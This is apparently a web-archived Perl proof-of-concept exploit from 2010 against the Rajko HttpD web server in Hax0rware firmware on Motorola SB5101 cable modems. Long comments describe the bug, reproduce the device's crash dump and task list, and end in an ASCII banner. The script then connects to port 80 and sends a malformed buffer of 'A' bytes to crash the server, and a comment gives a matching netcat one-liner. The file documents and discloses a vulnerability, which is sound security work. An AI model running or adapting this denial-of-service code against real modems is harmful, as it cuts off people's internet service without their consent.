扫码分享
验证:
体验盒子#!/usr/bin/perl
# Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC
# Author: Dillon Beresford
# Date: 6/6/2010
# Vendor: SBHacker & Motorola
# Software Link: http://www.sbhacker.net/forum/index.php
# Tested on Hax0rware 1.1 R30, R32 and R39
# Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit
# If an unauthenticated user or attacker sends any number of bytes greater than 1
# to port 80 without a proper request line, such as, [ GET /somepath/file.cgi ]
# the http daemon triggers a crash on thread at 0x8054b9ac Rajko HttpD.
# The developer of Hax0rware said he has used the modem's local ip to bind to the webserver
# to prevent attackers from triggering the vuln... This seems to be a quick fix atm.
# I'm sure he will eventually fix the bug and update the firmware.
# Motorola and Cable providers should warn their customers ( there are a number of legit )
# customers using this firmware for testing. Its important that you let
# customers know about the risk of third party firmware that isn't open source.
# nc 192.168.100.1 80 <sendsomeevil>
# For debugging telnet into the device 192.168.100.1 and run the poc.
# >>> YIKES... looks like you may have a problem! <<<
# r0/zero=00000000 r1/at=fffffffe r2/v0=805a1800 r3/v1=00000000
# r4/a0=8054aa58 r5/a1=00000000 r6/a2=00000000 r7/a3=00000000
# r8/t0=00000000 r9/t1=807bcae4 r10/t2 =00000041 r11/t3 =000043e0
# r12/t4 =4d154e68 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005
# r16/s0 =8054bacc r17/s1 =00000000 r18/s2 =805a1800 r19/s3 =00000000
# r20/s4 =00000001 r21/s5 =0000002a r22/s6 =8054b848 r23/s7 =00000001
# r24/t8 =00000000 r25/t9 =00000059 r26/k0 =00000000 r27/k1 =11110017
# r28/gp =80458fa0 r29/sp =8054b830 r30/fp =8054b960 r31/ra =8054a514
# PC : 0x8054a534error addr: 0x00000000
# cause: 0x00000008status: 0x1000ff03
# BCM interrupt enable: ffffbff7, status: 00000000
# Bad PC or SP.Can't trace the stack.
# Task: Rajko HttpD
# ---------------------------------------------------
# ID: 0x0006
# Handle: 0x8054b9ac
# Set Priority: 23
# Current Priority: 23
# State:SUSP
# Stack Base: 0x8054acd4
# Stack Size: 3280 bytes
# Stack Used: 1940 bytes
# Stack StackStack
#TaskId TaskNamePriority StateSizeUsed Margin
# ---------- ------------------------------------------------------------------------
# 0x8048f818 Idle Thread31 RUN 2048 6161432
# 0x805131d0 Network alarm support 6 SLEEP 225612321024
# 0x804924c8 Network support 7 SLEEP 819217046488
# 0x80513f20pthread.0000080015EXIT 785211046748
# 0x8048a1c8tStartup18 SLEEP1228852087080
# 0x8054b9ac Rajko HttpD23SUSP 328019401340
# 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568
# 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656
# 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584
# 0x807f64e8WDOG17 RUN 512027842336
# 0x807e86b4 BFC Ping Thread29 SLEEP 6144 4765668
# 0x807e4b3c ConsoleThread27 SLEEP368642172 34692
# 0x807d687c TelnetD23 RUN 22561980 276
# 0x807c666cCfgVB Thread23 SLEEP 4096 5043592
# 0x807c501cDHCM25 SLEEP16384 512 15872
# 0x807befacEvent Log Thread25 SLEEP 819221846008
# 0x8079a51cTime Of Day Thread23 SLEEP 6144 4565688
# 0x8079a98cCmDocsisIpThread23 SLEEP 8192 5047688
# 0x80793af8 CmBpiManagerThd25 SLEEP 8192 5087684
# 0x8078ff78 CmDsxHelper23 SLEEP 8192 5047688
# 0x807abf50 CmDocsisCtlThread21 SLEEP 8192 6087584
# 0x80788e44Scan Downstream Thread23 SLEEP 409614282668
# 0x80785c20RateShaping Thread23 SLEEP 4096 4443652
# 0x807f65e0CMHL23 SLEEP 4500 3684132
# 0x807f66d8CMHH21 SLEEP 4500 3524148
# 0x807f67d0ENRX23 RUN 450010283472
# 0x807f68c8ENTX23 SLEEP 4500 7843716
# 0x807f69c0ELNK23 SLEEP 4500 3204180
# 0x807f6ab8USTX23 SLEEP 4500 3404160
# 0x807f6bb0USRX23 SLEEP 4500 3724128
# 0x807f6ca8UBCT19 SLEEP 4500 3564144
# 0x807f6da0USRN23 SLEEP 4500 3404160
# 0x806a5a34DHCP Client Thread23 SLEEP12288 508 11780
# 0x807f6e98IpHalIst23 RUN 4500 8443656
# 0x8069fb98CmPropaneCtlThread23 SLEEP 819216286564
# 0x8069cf3c IGMP Thread23 SLEEP 4096 4563640
# 0x8069b640 NetToMedia Thread23 SLEEP 4096 7963300
# 0x806975a8 Trap Thread23 SLEEP16384 516 15868
# 0x807f6030 SNMP Thread23 SLEEP204801176 19304
# 0x805a7f0cDHCP Server Thread23 SLEEP 819214486744
# 0x8047b410tNonVolTimer30 SLEEP 204810281020
# Done!
# * *
#*** ***
#*** ***
#*** ***
# ***** *****
# ***** *****
# ***** *****
#******* *******
#******* *******
#******* *******
# ********* *********
# ********* *********
# ******* *******
#*********
#*** * ***
#** **
# ** **
# ** **
#** **
#* *
#MotorolaCorporation
# +----------------------------------------------------------------------------+
# | _/_/ _/_/_/_/_/_/|
# |_/_/ _/_/_/ Broadband |
# | _/_/ _/_/|
# |_/_/ _/_/_/_/ Foundation|
# | _/_/ _/_/|
# |_/ _/_/_/_/ Classes |
# | _/_/_/ _/_/_/|
# ||
# | Copyright (c) 1999 - 2007 Broadcom Corporation |
# ||
# | Revision:3.9.33.3 RELEASE|
# ||
# | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 |
# +----------------------------------------------------------------------------+
# | Standard Embedded Target Support for BFC |
# ||
# | Copyright (c) 2003 - 2007 Broadcom Corporation |
# ||
# | Revision:3.0.1 RELEASE |
# ||
# | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
# | Copyright (c) 2003 - 2007 Broadcom Corporation |
# ||
# | Revision:3.0.1 RELEASE |
# ||
# | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
# | Features:Bootloader-Compression-Support=0x19 |
# +----------------------------------------------------------------------------+
# | eCos BFC Application Layer |
# ||
# | Copyright (c) 1999 - 2007 Broadcom Corporation |
# ||
# | Revision:3.0.2 RELEASE |
# ||
# | Features:eCos Console Cmds, (no Idle Loop Profiler)|
# +----------------------------------------------------------------------------+
# | _/_/_/ _/|
# |_/_/_/_/ _/_/ DOCSIS Cable Modem|
# | _/_/_/ _/|
# |_/_/ _/ |
# | _/_/ _/|
# |_/_/_/ _/ |
# | _/_/_/ _/|
# ||
# | Copyright (c) 1999 - 2005 Broadcom Corporation |
# ||
# | Revision:3.9.33.3 RELEASE|
# ||
# | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
# | Features:Support CM Vendor Extension |
# +----------------------------------------------------------------------------+
# | Motorola Data-Only CM Vendor Extension |
# ||
# | Revision:3.0.0a RELEASE|
# ||
# | Features:DHCP ServerHTTP Server|
# +----------------------------------------------------------------------------+
# | Build Date:Apr 29 2009 |
# | Build Time:15:08:51|
# | Built By:vobadm02|
# +----------------------------------------------------------------------------+
use strict;
use Socket;
my $buff = "\x41" x50;
my $cablemodemip = shift || '192.168.100.1';
my $port = shift || 80;
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($cablemodemip);
my $paddr = sockaddr_in($port, $iaddr);
print "+---------------------------------------------------------------+\n".
"| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC|\n".
"| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n".
"| Version: 1.1 R30, R32 and R39 |\n".
"| Vendor: Motorola Corporation and SBHacker |\n".
"| Author: Dillon Beresford|\n".
"| Date: 6/6/2010|\n".
"+---------------------------------------------------------------+\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to cable modem httpd at $cablemodemip on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending our evil buffer...\n";
print SOCKET $buff."\n";
print "[+] Payload sent\n";
print "[+] This takes some time please wait.\n";
print "[+] Dont look at me look at the leds on your modem\n";
close SOCKET or die "close: $!";
sleep(25);
print "[+] Bye Bye Motorola SB5101 \n";
体验盒子
